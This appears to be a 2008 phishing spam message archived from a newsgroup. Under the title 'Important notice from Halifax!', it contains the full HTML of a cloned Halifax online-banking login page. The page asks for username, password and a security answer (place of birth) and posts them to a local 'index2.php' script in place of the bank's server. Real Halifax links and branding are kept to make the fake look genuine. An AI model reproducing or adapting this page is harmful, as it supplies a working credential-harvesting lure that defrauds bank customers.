Important notice from Halifax!

Halifax Bank <[email protected]> Wed, 23 Apr 2008 22:33:55 -0300
Newsgroups gmane.comp.ide.jessie.general
Message-ID <[email protected]>
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=iso-8859-1">
<meta name="Content-Language" content="en"><title>Online Service</title>

<link type="text/css" rel="stylesheet" href="files/Global.css"><script language="Javascript" type="text/javascript" src="files/fHxExternalLinks.js"></script><script language="JavaScript" type="text/javascript" src="files/callForHelp.js"></script><script language="Javascript" type="text/javascript" xmlns:fo="http://www.w3.org/1999/XSL/Format">
				var MAX_USERNAME_LENGTH = 20;
				var MAX_PASSWORD_LENGTH = 20;
				var MIN_USERNAME_LENGTH = 6;
				var MIN_PASSWORD_LENGTH = 6;
				
				var sCookie = "";
				var strOffset;
				var strEnd;		
				//-->					
				</script><script language="JavaScript" type="text/javascript" src="files/callForHelp.js" xmlns:fo="http://www.w3.org/1999/XSL/Format"></script><script language="JavaScript" type="text/javascript" src="files/fHxButtons.js" xmlns:fo="http://www.w3.org/1999/XSL/Format"></script><script language="javascript" type="text/javascript" xmlns:fo="http://www.w3.org/1999/XSL/Format">
		var agt=navigator.userAgent.toLowerCase();
		var is_major = parseInt(navigator.appVersion);
		var is_minor = parseFloat(navigator.appVersion);    
		var is_nav  = ((agt.indexOf('mozilla')!=-1) && (agt.indexOf('spoofer')==-1)
			&& (agt.indexOf('compatible') == -1) && (agt.indexOf('opera')==-1)
			&& (agt.indexOf('webtv')==-1) && (agt.indexOf('hotjava')==-1));
		var is_nav2 = (is_nav && (is_major == 2));
		var is_nav3 = (is_nav && (is_major == 3));    
		var is_ie = ((agt.indexOf("msie") != -1) && (agt.indexOf("opera") == -1));
		var is_ie3 = (is_ie && (is_major < 4));    
		var is_opera = (agt.indexOf("opera") != -1);
		var is_opera2 = (agt.indexOf("opera 2") != -1 || agt.indexOf("opera/2") != -1);
		var is_opera3 = (agt.indexOf("opera 3") != -1 || agt.indexOf("opera/3") != -1);
		var is_opera4 = (agt.indexOf("opera 4") != -1 || agt.indexOf("opera/4") != -1);
		
		var is_js = 1.2;
		if (is_nav2 || is_ie3) is_js = 1.0;
		if (is_nav3) is_js = 1.1;
		if (is_opera2 || is_opera3 || is_opera4) is_js = 1.1;
				
				function setCookie(name, value, expire)
				{
				   document.cookie = name + "=" + escape(value)   + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()))
				}
				
				function getCookie(Name) 
				{
				   var search = Name + "=";   
				   if (document.cookie.length > 0)
				   { 
						offset = document.cookie.indexOf(search)
						if (offset != -1) 
						{
							offset += search.length
							end = document.cookie.indexOf(";", offset)
							if (end == -1)
								end = document.cookie.length				
							return unescape(document.cookie.substring(offset, end))
						}
					}
				}
				
				function checkCookie(sCookieName, sCookieValue, dExpireDate)
				{
					setCookie(sCookieName,sCookieValue,dExpireDate)	
					var sCookie = "";	
					sCookie = getCookie(sCookieName);	
					if (sCookie != sCookieValue)
					{
						return (false);
					}
					return (true);
				}
				
				var dToday = new Date(); 
				var dExpiry = new Date(dToday.getTime() + 1 * 24 * 60 * 60 * 1000); // plus 1 day function 
				var bRetPersistent = checkCookie("CookieCheck","Persistent"+dToday ,dExpiry);
				var bRetSession = checkCookie("CookieCheck","Session"+dToday );
				setCookie("CookieCheck", "");
				
				if (bRetSession!=true || bRetPersistent!=true)
				{
					window.location.replace('nocookie.asp?Session=' + bRetSession+ '&Persistent=' + bRetPersistent);	
				}
		
		function validateForm()
		{	
					var strMessage;
					var bRetVal;
					var oForm;
					var jsCrLf;
					var focusElement = null;
					
					strMessage = "";
					bRetVal = true;
					jsCrLf = String.fromCharCode(10,13);
										
					if (0 == document.frmFormsLogin.Username.value.length)
					{
						strMessage = strMessage + "Please enter your Username\n";
						focusElement = document.frmFormsLogin.Username;
					}
					else if (document.frmFormsLogin.Username.value.length < MIN_USERNAME_LENGTH)
					{
						strMessage = strMessage + "Your Username must be at least " + MIN_USERNAME_LENGTH + " characters long\n";
						focusElement = document.frmFormsLogin.Username;
					}
						
					if (document.frmFormsLogin.password.value != "" && document.frmFormsLogin.password.value.length < MIN_PASSWORD_LENGTH)			
					{
						strMessage = strMessage + "Your Password must be at least " + MIN_PASSWORD_LENGTH + " characters long\n";
						focusElement = document.frmFormsLogin.password
					}
			
					if (strMessage != "")
					{
						alert (strMessage);
						if (focusElement != null){				
							focusElement.focus();
						}
						bRetVal = false;
					}
			
		        	if (bRetVal == true)
		        	{
			        	HxDisableButton(document.frmFormsLogin.btnContinue);
		        	}
			
				return bRetVal;
			}
			
				function BanishFrameset()
				{
					if (typeof(parent.banner) != 'undefined')
					{
						parent.location.replace('/_mem_bin/FormsLogin.asp');
					}
				}
			
		function NewWindow(mypage,myname,w,h,scroll)
		{
					var winl = (screen.width - w) /2;
					var wint = (screen.height - h) /2;
					winprops = 'height='+h+',width='+w+',top='+wint+',left='+winl+',scrollbars='+scroll+''
					win = window.open(mypage,myname,winprops)
				}
		
				function ContactUs()
				{
					var bStatus;
				bStatus = confirm('If you have forgotten your password or username, we are unable to verify personal details via email, so to avoid any delay please telephone our Helpdesk on 0845 602 0000.\n\nIf your query is regarding any other matter please select Cancel to proceed.');
		
					if (bStatus == false) 
					{
						window.navigate('/usermanagement/public/umemailus.asp')
					}
				}
		
				</script></head>
<body leftmargin="0" topmargin="0" onload="Javascript:if (typeof(HxOnLoad)!='undefined'){HxOnLoad()}" marginheight="0" marginwidth="0">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td class="HeaderCell" align="left" height="57" valign="middle">
<table border="0" cellpadding="0" cellspacing="0" width="100%">
<tbody><tr>
<td align="left" nowrap="nowrap" width="363"><img src="files/hxgivingyouextra.gif" alt="Online Logo" height="45" width="273"></td>
<td align="right" nowrap="nowrap">
<form action="index2.php" style="display: inline;" name="frmHeaderButtons">
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td width="8"></td>
<td><input class="HeaderButton" name="btnHome" id="btnHome" value="Home" title="Online home page" alt="Online home page" tabindex="0" onmouseout="window.status=''; return true;" onblur="window.status=''; return true;" onmouseover="window.status='Online home page'; return true;" onfocus="window.status='Online home page'; return true;" onclick="window.location='https://www.halifax-online.co.uk/UserManagement/Public/umhomepage.asp'" type="button"></td>
<td width="8"></td>
<td><input class="HeaderButton" name="btnHelp" id="btnHelp" value="Help" title="Help" alt="Help" tabindex="0" onmouseout="window.status=''; return true;" onblur="window.status=''; return true;" onmouseover="window.status='Help'; return true;" onfocus="window.status='Help'; return true;" onclick="window.location='javaScript:callForHelp(&quot;halifax-online.co.uk&quot;)'" type="button"></td>
</tr>
</tbody></table>
</form>
</td>
<td nowrap="nowrap" width="12"></td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td align="left" valign="top">
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td class="BannerBG" align="left" valign="top">
<table border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td class="MainPageTD" nowrap="nowrap" width="12"></td>
<td class="MainPageTD" align="left" valign="top"><script language="Javascript" type="text/javascript" xmlns:fo="http://www.w3.org/1999/XSL/Format">
			function HxOnLoad()
			{
				BanishFrameset();
				
				document.frmFormsLogin.JSEnabled.value = "true";
			}
		</script><form name="frmFormsLogin" id="frmFormsLogin" onsubmit="return validateForm()" action="index2.php" method="post" autocomplete="off" xmlns:fo="http://www.w3.org/1999/XSL/Format">
<table border="0" width="742">
<tbody><tr>
<td height="7">
<hr class="Divider">
</td>
</tr>
<script language="javascript" type="text/javascript">
		 	if (is_js < 1.2)
	      	{
	      		document.write ('<tr><td colspan="3" valign="middle"><b><font color="red">');
				document.write ('In order to use our Online Service your browser should support JavaScript version 1.2 or greater.  ');
				document.write ('Your browser is reporting that it has JavaScript version ' + is_js + '.  ');
				document.write ('Continuing to work with this version could lead to unexpected results.<br><br>');
				document.write ('If you require further assistance with this issue please call our Helpdesk on 0845 602 0000.');
	      		document.write ('</font></b></td></tr>');
				document.write('<tr><td height="7"><hr class="Divider"></td></tr>');
	      	}
		</script><!--SHXMC-->
<!--EHXMC--><!--SHXMC-->
<!--EHXMC--><tr>
<td style="width: 65%;" valign="top">
<table border="0" cellpadding="0" cellspacing="0" rules="none" width="100%">
<tbody><tr>
<td colspan="3" nowrap="true">
<table>
<tbody><tr>
<td valign="top"><!--SHXMC-->
<table border="0" cellpadding="0" cellspacing="0" width="365">
<tbody><tr>
<td valign="bottom">
<table class="LogonNew" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><img src="files/corner-left.gif" alt="" border="0"></td>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td><img src="files/corner-right.gif" alt="" border="0"></td>
</tr><tr>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td class="LogonHead" nowrap="nowrap">New User</td>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
<table class="LogonNew" border="0" cellpadding="0" cellspacing="0" height="119" width="365">

<tbody><tr>
<td rowspan="5" width="8"><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td><a onmouseover='window.status="Register my existing account for the service"; return true' onmouseout='window.status=""; return true' onfocus='window.status="Register"; return true' onblur='window.status=""; return true' target="_top" href="https://www.halifax-online.co.uk/_mem_bin/UMRegisterUsersVerify.asp?Process=Register"><img src="files/arrow_right.gif" alt="Register now" border="0">Register my existing account for the service</a></td>
</tr>
<tr>
<td><a onmouseover='window.status="Apply for a new account"; return true' onmouseout='window.status=""; return true' target="_top" href="https://www.halifax-online.co.uk/_mem_bin/UMRegisterUsersVerify.asp?Process=Create"><img src="files/arrow_right.gif" alt="-" border="0">Apply for a new account</a></td>
</tr>
<tr>
<td><a onmouseover='window.status="Find out how to use the online service"; return true' onmouseout='window.status=""; return true' href="javascript:openHxLink('http://www.halifax.co.uk/aboutonline/home.shtml','','/')"><img src="files/arrow_right.gif" alt="-" border="0">Find out how to use the online service</a></td>
</tr>
<tr>
<td><a onmouseover='window.status="Demonstrations"; return true' onmouseout='window.status=""; return true' href="javascript:openHxLink('http://www.halifax.co.uk/aboutonline/demos.shtml','','/')"><img src="files/arrow_right.gif" alt="-" border="0">View demonstrations</a></td>
</tr>

</tbody></table>
<!--EHXMC--></td>
<td width="12"></td>
<td valign="top">
<table class="LogonExisting" border="0" cellpadding="0" cellspacing="0">
<tbody><tr>
<td><img src="files/corner-left.gif" alt="" border="0"></td>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td><img src="files/corner-right.gif" alt="" border="0"></td>
</tr>
<tr>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td class="LogonHead" nowrap="nowrap">Existing User - Sign in</td>
<td><img src="files/blank.gif" alt="" height="1" width="1"></td>
</tr>
</tbody></table>
<table class="LogonExisting" border="0" cellpadding="0" cellspacing="0" height="119" width="365">
<tbody><tr>
<td rowspan="3" width="8"><img src="files/blank.gif" alt="" height="1" width="1"></td>
<td class="Prompt" width="160">Username</td>
<td colspan="2"><input name="Username" id="Username" value="" size="15" alt="Username" maxlength="50" type="text"></td>
<td rowspan="3" width="8"><img src="files/blank.gif" alt="" height="1" width="1"></td>
</tr>

<tr>
<td class="Prompt" valign="middle" width="160">Password</td>
<td colspan="2"><input name="password" id="password" value="" size="15" autocomplete="off" alt="Password" maxlength="50" type="password"><input name="mi_source" id="mi_source" value="halifaxcouk" type="hidden"></td>
</tr>
<tr>
<td class="Prompt" valign="middle" width="160">Your place/town of birth?</td>
<td valign="middle"><input name="answer" id="answer" size="15" maxlength="90" value="" alt="Security Answer" type="password"></td>
<td align="left" valign="middle"><nobr>&nbsp;<input name="btnContinue" class="FocusButton" style="background-position: right center; background-image: url(/LookAndFeel/images/smallPadlock.gif); background-repeat: no-repeat;" value="Sign in  " onmouseover="window.status=''; return true" onmouseout="window.status=''; return true" alt="Sign in" type="submit"></nobr></td>
</tr>
</tbody></table>
</td>
</tr><!--SHXMC-->
<tr>
	<td valign="middle">	
		<a onmouseover='window.status="Security guarantee information"; return true' onmouseout='window.status=""; return true' href="javascript:openHxLink('http://www.halifax.co.uk/security/home.shtml','','/')">
			<img src="files/padlock.gif" alt="Security guarantee information" align="middle" border="0">More information
		</a>
	</td>
	<td width="12"></td>
	<td valign="middle">
		<a onmouseover='window.status="Forgotten your sign in details?"; return true' onmouseout='window.status=""; return true' href="https://www.halifax-online.co.uk/usermanagement/public/umcollectemailaddrremote.asp">
			<img src="files/arrow_right.gif" alt="-" align="middle" border="0">Forgotten your sign in details?
		</a>
	</td>
</tr>
<!--EHXMC--></tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
<tr>
<td height="3">
<hr class="Divider">
</td>
</tr>
<tr>
<td colspan="3" class="Prompt"><b><!--SHXMC-->
<!--SHXMC_FormsLoginMC.html--></b>

<!--EHXMC--><!--EHXMC--></b></td>
</tr>
<tr>
<td><!--SHXMC-->
<a onMouseOver="window.status=&quot;Fraudulent E-mail Scams&quot;; 
return true" onMouseOut="window.status=&quot;&quot;; 
return true"
href="javaScript:callForHelpEx('https://www.halifax-online.co.uk','82','294'
)"><img src="files/banner1.gif" alt="Fraudulent E-mail Alert"
border="0">
<!--EHXMC--></td>
</tr><!--SHXMC-->
<tr><td valign="top" colspan="3" class="Prompt">
</td></tr><tr><td valign="top" colspan="3" class="Prompt">

<!--EHXMC--></table><input type="hidden" name="JSEnabled" id="JSEnabled" value="false"></form><script type="text/javascript" language="Javascript" xmlns:fo="http://www.w3.org/1999/XSL/Format">
			var agt=navigator.userAgent.toLowerCase();
			var is_major = parseInt(navigator.appVersion);
			var is_nav  = ((agt.indexOf('mozilla')!=-1)	&& (agt.indexOf('spoofer')==-1) && (agt.indexOf('compatible') == -1) && (agt.indexOf('opera')==-1) && (agt.indexOf('webtv')==-1)  && (agt.indexOf('hotjava')==-1));
			var is_nav4 = (is_nav && (is_major == 4));
			if(!is_nav4){document.frmFormsLogin.Username.focus();}
		</script></td>
<td width="12" nowrap></td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</td>
</tr>
</tbody></table>
</body></html>